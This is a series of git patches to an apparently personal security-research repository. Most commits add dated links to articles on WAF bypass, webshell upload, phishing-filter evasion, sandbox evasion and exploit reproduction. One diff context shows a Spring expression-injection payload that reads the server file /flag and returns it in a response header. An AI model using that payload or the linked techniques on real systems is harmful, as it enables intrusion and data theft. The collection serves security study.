"java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index d007b10..34b177d 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -283,3 +283,4 @@ + 2023/02/23 [实战 | 记一次针对非法网站的SSRF渗透](https://mp.weixin.qq.com/s/yfWAu6ebXA14GfOTP86XsA) + 2023/02/24 [【剖析 | SOFARPC 框架】之 SOFARPC 序列化比较](https://www.sofastack.tech/blog/sofa-rpc-serialization-comparison/) + 2023/03/02 [绕过Struts2 waf写入冰蝎马](https://mp.weixin.qq.com/s?__biz=MzkzNzE4MTk4Nw==&mid=2247485835&idx=1&sn=d09939cc178f8e7aaa085bbbef622557&chksm=c2921fc7f5e596d1312a37b816345a78d4343d509432725a0a558745304c579b9044ef870267&mpshare=1&scene=23&srcid=02286Y2A5JswXVZdDgoD4BXN&sharer_sharetime=1677591306084&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2023/03/02 [加密SOCKS5信道中防DNS泄露](https://mp.weixin.qq.com/s?__biz=MzUzMjQyMDE3Ng==&mid=2247486522&idx=1&sn=b438259298ecc59b9798dc689143d537&chksm=fab2cf05cdc546135f1347b2138b7d9d5332e30be4f6e059228f15f690a909aff83abf1d03ac&mpshare=1&scene=23&srcid=0228Kxs8UTPwmU6zhqNTsXVQ&sharer_sharetime=1677551815058&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From a647c3832d3d6ee4f99d95cab58579f36286c394 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 2 Mar 2023 23:35:08 +0800 Subject: [PATCH 215/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 34b177d..343a0e9 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -284,3 +284,4 @@ + 2023/02/24 [【剖析 | SOFARPC 框架】之 SOFARPC 序列化比较](https://www.sofastack.tech/blog/sofa-rpc-serialization-comparison/) + 2023/03/02 [绕过Struts2 waf写入冰蝎马](https://mp.weixin.qq.com/s?__biz=MzkzNzE4MTk4Nw==&mid=2247485835&idx=1&sn=d09939cc178f8e7aaa085bbbef622557&chksm=c2921fc7f5e596d1312a37b816345a78d4343d509432725a0a558745304c579b9044ef870267&mpshare=1&scene=23&srcid=02286Y2A5JswXVZdDgoD4BXN&sharer_sharetime=1677591306084&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/03/02 [加密SOCKS5信道中防DNS泄露](https://mp.weixin.qq.com/s?__biz=MzUzMjQyMDE3Ng==&mid=2247486522&idx=1&sn=b438259298ecc59b9798dc689143d537&chksm=fab2cf05cdc546135f1347b2138b7d9d5332e30be4f6e059228f15f690a909aff83abf1d03ac&mpshare=1&scene=23&srcid=0228Kxs8UTPwmU6zhqNTsXVQ&sharer_sharetime=1677551815058&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2023/03/02 [【渗透测试实战】--waf绕过--打狗棒法](https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==&mid=2247527297&idx=1&sn=d7f1896b68a2253dcecf2780fb49b8ba&chksm=ce64c118f913480e4edd66dff46f1a9181b5c61dd1b3324db41b95338804a7124868c5740fff&mpshare=1&scene=23&srcid=03026OJPm0666pbtYyYnpZVR&sharer_sharetime=1677756888794&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **1.Content-Type中的boundary边界混淆绕过 ** From bb2868e6ac6d1d7dd3db990593907d155c71aa67 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 5 Mar 2023 19:08:05 +0800 Subject: [PATCH 216/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 343a0e9..93ff134 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -285,3 +285,4 @@ + 2023/03/02 [绕过Struts2 waf写入冰蝎马](https://mp.weixin.qq.com/s?__biz=MzkzNzE4MTk4Nw==&mid=2247485835&idx=1&sn=d09939cc178f8e7aaa085bbbef622557&chksm=c2921fc7f5e596d1312a37b816345a78d4343d509432725a0a558745304c579b9044ef870267&mpshare=1&scene=23&srcid=02286Y2A5JswXVZdDgoD4BXN&sharer_sharetime=1677591306084&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/03/02 [加密SOCKS5信道中防DNS泄露](https://mp.weixin.qq.com/s?__biz=MzUzMjQyMDE3Ng==&mid=2247486522&idx=1&sn=b438259298ecc59b9798dc689143d537&chksm=fab2cf05cdc546135f1347b2138b7d9d5332e30be4f6e059228f15f690a909aff83abf1d03ac&mpshare=1&scene=23&srcid=0228Kxs8UTPwmU6zhqNTsXVQ&sharer_sharetime=1677551815058&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/03/02 [【渗透测试实战】--waf绕过--打狗棒法](https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==&mid=2247527297&idx=1&sn=d7f1896b68a2253dcecf2780fb49b8ba&chksm=ce64c118f913480e4edd66dff46f1a9181b5c61dd1b3324db41b95338804a7124868c5740fff&mpshare=1&scene=23&srcid=03026OJPm0666pbtYyYnpZVR&sharer_sharetime=1677756888794&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **1.Content-Type中的boundary边界混淆绕过 ** ++ 2023/03/05 [代码执行之篡改 deb 包控制文件](https://xz.aliyun.com/t/12250) **在考虑msi 安装程序能不能利用?** From 1edd6659cf14d966231c3df6fec6cb88ad485dd9 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 5 Mar 2023 19:17:10 +0800 Subject: [PATCH 217/257] Update Readme.md --- shell/SPEL/Readme.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/shell/SPEL/Readme.md b/shell/SPEL/Readme.md index 82b8808..e989f3e 100644 --- a/shell/SPEL/Readme.md +++ b/shell/SPEL/Readme.md 
@@ -113,6 +113,8 @@ print(')}') 其他bypass: https://xz.aliyun.com/t/9245 +https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/ + ## springboot回显 ``` Java.type("org.springframework.web.context.request.RequestContextHolder").currentRequestAttributes().getResponse().addHeader("test",new java.lang.String(Java.type("sun.misc.IOUtils").readFully(new java.io.FileInputStream("/flag"),1024,false))); From ee15da5ce535972548f4b2621fd8046414925caa Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 5 Mar 2023 19:18:28 +0800 Subject: [PATCH 218/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 93ff134..af19bb5 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -285,4 +285,4 @@ + 2023/03/02 [绕过Struts2 waf写入冰蝎马](https://mp.weixin.qq.com/s?__biz=MzkzNzE4MTk4Nw==&mid=2247485835&idx=1&sn=d09939cc178f8e7aaa085bbbef622557&chksm=c2921fc7f5e596d1312a37b816345a78d4343d509432725a0a558745304c579b9044ef870267&mpshare=1&scene=23&srcid=02286Y2A5JswXVZdDgoD4BXN&sharer_sharetime=1677591306084&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/03/02 [加密SOCKS5信道中防DNS泄露](https://mp.weixin.qq.com/s?__biz=MzUzMjQyMDE3Ng==&mid=2247486522&idx=1&sn=b438259298ecc59b9798dc689143d537&chksm=fab2cf05cdc546135f1347b2138b7d9d5332e30be4f6e059228f15f690a909aff83abf1d03ac&mpshare=1&scene=23&srcid=0228Kxs8UTPwmU6zhqNTsXVQ&sharer_sharetime=1677551815058&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/03/02 [【渗透测试实战】--waf绕过--打狗棒法](https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==&mid=2247527297&idx=1&sn=d7f1896b68a2253dcecf2780fb49b8ba&chksm=ce64c118f913480e4edd66dff46f1a9181b5c61dd1b3324db41b95338804a7124868c5740fff&mpshare=1&scene=23&srcid=03026OJPm0666pbtYyYnpZVR&sharer_sharetime=1677756888794&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **1.Content-Type中的boundary边界混淆绕过 ** -+ 2023/03/05 [代码执行之篡改 deb 包控制文件](https://xz.aliyun.com/t/12250) **在考虑msi 安装程序能不能利用?** ++ 2023/03/05 [代码执行之篡改 deb 包控制文件](https://xz.aliyun.com/t/12250) **在考虑msi 安装程序能不能利用?** [Threat Analysis: MSI - Masquerading as a Software Installer](https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer) From f27ab7aa58e9fe5a51fa6a996a7dc7489179428e Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 7 Mar 2023 13:41:19 +0800 Subject: [PATCH 219/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index af19bb5..e25be21 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -286,3 +286,4 @@ + 2023/03/02 [加密SOCKS5信道中防DNS泄露](https://mp.weixin.qq.com/s?__biz=MzUzMjQyMDE3Ng==&mid=2247486522&idx=1&sn=b438259298ecc59b9798dc689143d537&chksm=fab2cf05cdc546135f1347b2138b7d9d5332e30be4f6e059228f15f690a909aff83abf1d03ac&mpshare=1&scene=23&srcid=0228Kxs8UTPwmU6zhqNTsXVQ&sharer_sharetime=1677551815058&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/03/02 [【渗透测试实战】--waf绕过--打狗棒法](https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==&mid=2247527297&idx=1&sn=d7f1896b68a2253dcecf2780fb49b8ba&chksm=ce64c118f913480e4edd66dff46f1a9181b5c61dd1b3324db41b95338804a7124868c5740fff&mpshare=1&scene=23&srcid=03026OJPm0666pbtYyYnpZVR&sharer_sharetime=1677756888794&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **1.Content-Type中的boundary边界混淆绕过 ** + 2023/03/05 [代码执行之篡改 deb 包控制文件](https://xz.aliyun.com/t/12250) **在考虑msi 安装程序能不能利用?** [Threat Analysis: MSI - Masquerading as a Software Installer](https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer) ++ 2023/03/07 [为什么 Nginx 比 Apache 更牛叉?](https://mp.weixin.qq.com/s/nz0OZsa0rEyF5L40rD5zYg) From 7c826d0ce4ef148e0ff87af5e6a2557df40e46fe Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 8 Mar 2023 17:06:56 +0800 Subject: [PATCH 220/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index e25be21..43b12c0 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -287,3 +287,4 @@ + 2023/03/02 [【渗透测试实战】--waf绕过--打狗棒法](https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==&mid=2247527297&idx=1&sn=d7f1896b68a2253dcecf2780fb49b8ba&chksm=ce64c118f913480e4edd66dff46f1a9181b5c61dd1b3324db41b95338804a7124868c5740fff&mpshare=1&scene=23&srcid=03026OJPm0666pbtYyYnpZVR&sharer_sharetime=1677756888794&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **1.Content-Type中的boundary边界混淆绕过 ** + 2023/03/05 [代码执行之篡改 deb 包控制文件](https://xz.aliyun.com/t/12250) **在考虑msi 安装程序能不能利用?** [Threat Analysis: MSI - Masquerading as a Software Installer](https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer) + 2023/03/07 [为什么 Nginx 比 Apache 更牛叉?](https://mp.weixin.qq.com/s/nz0OZsa0rEyF5L40rD5zYg) ++ 2023/03/08 [A New Vector For “Dirty” Arbitrary File Write to RCE](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html) [uwsgi生产环境](https://www.cnblogs.com/chunlin99x/p/16291085.html) uwsgi环境写文件rce From f522f8d08343b78113d6eba260a4cdd8285b148d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 11 Mar 2023 15:27:52 +0800 Subject: [PATCH 221/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 43b12c0..cc935fb 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -288,3 +288,4 @@ + 2023/03/05 [代码执行之篡改 deb 包控制文件](https://xz.aliyun.com/t/12250) **在考虑msi 安装程序能不能利用?** [Threat Analysis: MSI - Masquerading as a Software Installer](https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer) + 2023/03/07 [为什么 Nginx 比 Apache 更牛叉?](https://mp.weixin.qq.com/s/nz0OZsa0rEyF5L40rD5zYg) + 2023/03/08 [A New Vector For “Dirty” Arbitrary File Write to RCE](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html) [uwsgi生产环境](https://www.cnblogs.com/chunlin99x/p/16291085.html) uwsgi环境写文件rce ++ 2023/03/11 [CVE-2022-36413 Unauthorized Reset Password of Zoho ManageEngine ADSelfService Plus](https://blog.noah.360.net/cve-2022-36413-unauthorized-reset-password-of-zoho-manageengine-adselfservice-plus/) From 6a53275e3d9f210d69ba80eec2d8f41856d79dee Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 11 Mar 2023 21:26:49 +0800 Subject: [PATCH 222/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index cc935fb..9c448bc 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -289,3 +289,4 @@ + 2023/03/07 [为什么 Nginx 比 Apache 更牛叉?](https://mp.weixin.qq.com/s/nz0OZsa0rEyF5L40rD5zYg) + 2023/03/08 [A New Vector For “Dirty” Arbitrary File Write to RCE](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html) [uwsgi生产环境](https://www.cnblogs.com/chunlin99x/p/16291085.html) uwsgi环境写文件rce + 2023/03/11 [CVE-2022-36413 Unauthorized Reset Password of Zoho ManageEngine ADSelfService Plus](https://blog.noah.360.net/cve-2022-36413-unauthorized-reset-password-of-zoho-manageengine-adselfservice-plus/) ++ 2023/03/11 [第53篇:某OA系统的H2数据库延时注入点不出网拿shell方法](https://mp.weixin.qq.com/s/Lu4V_J6cresqmVnfQmg05g) **思路不错** 
From a27e7a5591ab749e9162871f86836366aae41ede Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 11 Mar 2023 23:55:29 +0800 Subject: [PATCH 223/257] Update Readme.md --- Jetty/Readme.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Jetty/Readme.md b/Jetty/Readme.md index c036d30..5d7c237 100644 --- a/Jetty/Readme.md +++ b/Jetty/Readme.md @@ -2,4 +2,4 @@ 好文章: -https://swarm.ptsecurity.com/tag/web-application-security/ +https://swarm.ptsecurity.com/jetty-features-for-hacking-web-apps/ From 76f698fba4673f0994ce12893e07ecd9d32565c1 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 12 Mar 2023 18:50:02 +0800 Subject: [PATCH 224/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 9c448bc..9e15d67 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -290,3 +290,4 @@ + 2023/03/08 [A New Vector For “Dirty” Arbitrary File Write to RCE](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html) [uwsgi生产环境](https://www.cnblogs.com/chunlin99x/p/16291085.html) uwsgi环境写文件rce + 2023/03/11 [CVE-2022-36413 Unauthorized Reset Password of Zoho ManageEngine ADSelfService Plus](https://blog.noah.360.net/cve-2022-36413-unauthorized-reset-password-of-zoho-manageengine-adselfservice-plus/) + 2023/03/11 [第53篇:某OA系统的H2数据库延时注入点不出网拿shell方法](https://mp.weixin.qq.com/s/Lu4V_J6cresqmVnfQmg05g) **思路不错** ++ 2023/03/12 [chatgpt能分析0day漏洞么?](https://mp.weixin.qq.com/s?__biz=MzI1MDA1MjcxMw==&mid=2649907994&idx=1&sn=8984318d81b046ab202650f52557a12b&chksm=f18eea1cc6f9630aca2d2e6d88a767ffc5bd2f44e4367e1b0c68669b11097388b3c5f1e044a0&mpshare=1&scene=23&srcid=0312uHzVdJj4KvnBdTHy0TKM&sharer_sharetime=1678611522010&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **ai np** From 02d456e5f11c485967dd31b5301e12d19a26766d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 12 Mar 2023 19:09:17 +0800 Subject: [PATCH 225/257] Update Readme.md --- Jetty/Readme.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Jetty/Readme.md b/Jetty/Readme.md index 5d7c237..5405b5c 100644 --- a/Jetty/Readme.md +++ b/Jetty/Readme.md @@ -3,3 +3,5 @@ 好文章: https://swarm.ptsecurity.com/jetty-features-for-hacking-web-apps/ + +https://xz.aliyun.com/t/10039 From 3f9c672c1d196f3f2f511be00585af28fc660134 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 12 Mar 2023 22:59:08 +0800 Subject: [PATCH 226/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 9e15d67..65c6fc7 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -291,3 +291,4 @@ + 2023/03/11 [CVE-2022-36413 Unauthorized Reset Password of Zoho ManageEngine ADSelfService Plus](https://blog.noah.360.net/cve-2022-36413-unauthorized-reset-password-of-zoho-manageengine-adselfservice-plus/) + 2023/03/11 [第53篇:某OA系统的H2数据库延时注入点不出网拿shell方法](https://mp.weixin.qq.com/s/Lu4V_J6cresqmVnfQmg05g) **思路不错** + 2023/03/12 [chatgpt能分析0day漏洞么?](https://mp.weixin.qq.com/s?__biz=MzI1MDA1MjcxMw==&mid=2649907994&idx=1&sn=8984318d81b046ab202650f52557a12b&chksm=f18eea1cc6f9630aca2d2e6d88a767ffc5bd2f44e4367e1b0c68669b11097388b3c5f1e044a0&mpshare=1&scene=23&srcid=0312uHzVdJj4KvnBdTHy0TKM&sharer_sharetime=1678611522010&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **ai np** ++ 2023/03/12 [钓鱼邮件中绕过内容检测的一种方式](https://mp.weixin.qq.com/s/oDFCn5K4rXXg-_ALv0-qYw) **bypass 好多内容敏感检测** From 8ea03eebe5c5fe80c327f099b15fa780f054640a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 13 Mar 2023 18:12:18 +0800 Subject: [PATCH 227/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 65c6fc7..e11e728 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -292,3 +292,4 @@ + 2023/03/11 [第53篇:某OA系统的H2数据库延时注入点不出网拿shell方法](https://mp.weixin.qq.com/s/Lu4V_J6cresqmVnfQmg05g) **思路不错** + 2023/03/12 [chatgpt能分析0day漏洞么?](https://mp.weixin.qq.com/s?__biz=MzI1MDA1MjcxMw==&mid=2649907994&idx=1&sn=8984318d81b046ab202650f52557a12b&chksm=f18eea1cc6f9630aca2d2e6d88a767ffc5bd2f44e4367e1b0c68669b11097388b3c5f1e044a0&mpshare=1&scene=23&srcid=0312uHzVdJj4KvnBdTHy0TKM&sharer_sharetime=1678611522010&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **ai np** + 2023/03/12 [钓鱼邮件中绕过内容检测的一种方式](https://mp.weixin.qq.com/s/oDFCn5K4rXXg-_ALv0-qYw) **bypass 好多内容敏感检测** ++ 2023/03/13 [攻击技术研判 | 使用蜂鸣器对抗沙箱检测技术](https://mp.weixin.qq.com/s/DrUWV4baPIA3WtCVjFp3gw) **就是利用其api实现sleep的效果,对抗沙箱** From fe7f2867c318b254903e4b6be87a08b85339c787 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 14 Mar 2023 10:33:17 +0800 Subject: [PATCH 228/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index e11e728..46272cd 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -293,3 +293,4 @@ + 2023/03/12 [chatgpt能分析0day漏洞么?](https://mp.weixin.qq.com/s?__biz=MzI1MDA1MjcxMw==&mid=2649907994&idx=1&sn=8984318d81b046ab202650f52557a12b&chksm=f18eea1cc6f9630aca2d2e6d88a767ffc5bd2f44e4367e1b0c68669b11097388b3c5f1e044a0&mpshare=1&scene=23&srcid=0312uHzVdJj4KvnBdTHy0TKM&sharer_sharetime=1678611522010&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **ai np** + 2023/03/12 [钓鱼邮件中绕过内容检测的一种方式](https://mp.weixin.qq.com/s/oDFCn5K4rXXg-_ALv0-qYw) **bypass 好多内容敏感检测** + 2023/03/13 [攻击技术研判 | 使用蜂鸣器对抗沙箱检测技术](https://mp.weixin.qq.com/s/DrUWV4baPIA3WtCVjFp3gw) **就是利用其api实现sleep的效果,对抗沙箱** ++ 2023/03/14 [从挑战赛看阿里云RASP防御优势与云上最佳实践](https://mp.weixin.qq.com/s?__biz=MzA4MTQ2MjI5OA==&mid=2664088876&idx=1&sn=cc29a7dc475e08300390eae40902808d&chksm=84aaf059b3dd794fe63c1f8af5cdafbca404bdd2e956a658f0807ba5e74d98cfc9369573e64c&mpshare=1&scene=23&srcid=0313b3xCwrxOPs14Cc4DeDtz&sharer_sharetime=1678702681315&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From 26ee70fed9e9fbe051a6a85cbe68e70864e4be8f Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 15 Mar 2023 14:43:24 +0800 Subject: [PATCH 229/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 46272cd..1e58f49 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -294,3 +294,4 @@ + 2023/03/12 [钓鱼邮件中绕过内容检测的一种方式](https://mp.weixin.qq.com/s/oDFCn5K4rXXg-_ALv0-qYw) **bypass 好多内容敏感检测** + 2023/03/13 [攻击技术研判 | 使用蜂鸣器对抗沙箱检测技术](https://mp.weixin.qq.com/s/DrUWV4baPIA3WtCVjFp3gw) **就是利用其api实现sleep的效果,对抗沙箱** + 2023/03/14 [从挑战赛看阿里云RASP防御优势与云上最佳实践](https://mp.weixin.qq.com/s?__biz=MzA4MTQ2MjI5OA==&mid=2664088876&idx=1&sn=cc29a7dc475e08300390eae40902808d&chksm=84aaf059b3dd794fe63c1f8af5cdafbca404bdd2e956a658f0807ba5e74d98cfc9369573e64c&mpshare=1&scene=23&srcid=0313b3xCwrxOPs14Cc4DeDtz&sharer_sharetime=1678702681315&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2023/03/15 [永恒之蓝Windows10版踩坑复现](https://mp.weixin.qq.com/s/H8cOsXmH0EzDPEBsPgvMrg) From ab0ce4738def82270edfe486823fa1b7c32e18f5 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 17 Mar 2023 12:11:19 +0800 Subject: [PATCH 230/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 1e58f49..b0f69b6 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -295,3 +295,4 @@ + 2023/03/13 [攻击技术研判 | 使用蜂鸣器对抗沙箱检测技术](https://mp.weixin.qq.com/s/DrUWV4baPIA3WtCVjFp3gw) **就是利用其api实现sleep的效果,对抗沙箱** + 2023/03/14 [从挑战赛看阿里云RASP防御优势与云上最佳实践](https://mp.weixin.qq.com/s?__biz=MzA4MTQ2MjI5OA==&mid=2664088876&idx=1&sn=cc29a7dc475e08300390eae40902808d&chksm=84aaf059b3dd794fe63c1f8af5cdafbca404bdd2e956a658f0807ba5e74d98cfc9369573e64c&mpshare=1&scene=23&srcid=0313b3xCwrxOPs14Cc4DeDtz&sharer_sharetime=1678702681315&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/03/15 [永恒之蓝Windows10版踩坑复现](https://mp.weixin.qq.com/s/H8cOsXmH0EzDPEBsPgvMrg) ++ 2023/03/17 [老洞新绕](https://mp.weixin.qq.com/s/V1MWq8NBkSDjTBY4AiW6Pw) **tomcat 路径特性和Axis特性** From 48d65e312141dca3421ec78d72f5d2fb56964f3d Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 17 Mar 2023 12:15:35 +0800 Subject: [PATCH 231/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b0f69b6..1c76aa4 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -296,3 +296,4 @@ + 2023/03/14 [从挑战赛看阿里云RASP防御优势与云上最佳实践](https://mp.weixin.qq.com/s?__biz=MzA4MTQ2MjI5OA==&mid=2664088876&idx=1&sn=cc29a7dc475e08300390eae40902808d&chksm=84aaf059b3dd794fe63c1f8af5cdafbca404bdd2e956a658f0807ba5e74d98cfc9369573e64c&mpshare=1&scene=23&srcid=0313b3xCwrxOPs14Cc4DeDtz&sharer_sharetime=1678702681315&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/03/15 [永恒之蓝Windows10版踩坑复现](https://mp.weixin.qq.com/s/H8cOsXmH0EzDPEBsPgvMrg) + 2023/03/17 [老洞新绕](https://mp.weixin.qq.com/s/V1MWq8NBkSDjTBY4AiW6Pw) **tomcat 路径特性和Axis特性** ++ 2023/03/17 [Spring Boot 如果防护 XSS + SQL 注入攻击 ?一文带你搞定!](https://mp.weixin.qq.com/s/QTUr9ZiXMWqFu1-yhMICjghttps://mp.weixin.qq.com/s/QTUr9ZiXMWqFu1-yhMICjg) From c5e3fd5a005c6f7030be432f06c93deca0810798 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 19 Mar 2023 21:11:47 +0800 Subject: [PATCH 232/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 1c76aa4..898ef28 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
